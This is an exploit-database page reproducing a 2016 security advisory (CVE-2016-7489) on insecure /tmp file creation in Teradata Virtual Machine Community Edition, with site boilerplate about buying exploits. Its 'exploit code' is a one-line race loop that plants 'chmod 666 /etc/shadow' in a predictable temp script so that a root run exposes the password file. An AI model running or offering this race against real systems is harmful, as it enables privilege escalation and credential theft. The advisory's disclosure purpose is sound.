0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Teradata Virtual Machine Community Edition 15.0 Insecure File Creation Vulnerability

Author

Larry Cashdollar

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use.
Vulnerability:
 Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl

320         `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ;

If a regular user controls  /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject
commands to be executed as that user.

for example:

$ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; done

If root or any other account runs that .pl script I see these files being created in /tmp

[C] -rw-r----- 1 root root 14  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
[U] -rw-r----- 1 root root 14  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
[C] -rw-r----- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r----- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[U] -rw-r----- 1 root root 44  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[U] -rw-r----- 1 root root 152  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[C] -rw-r----- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r----- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr  

CVE-ID: CVE-2016-7489
Exploit Code:
  aC/ $ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; done
Advisory: www.vapidlabs.com/advisory.php?v=173

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Teradata Virtual Machine Community Edition 15.0 Insecure File Creation Vulnerability

Report Error

Report Error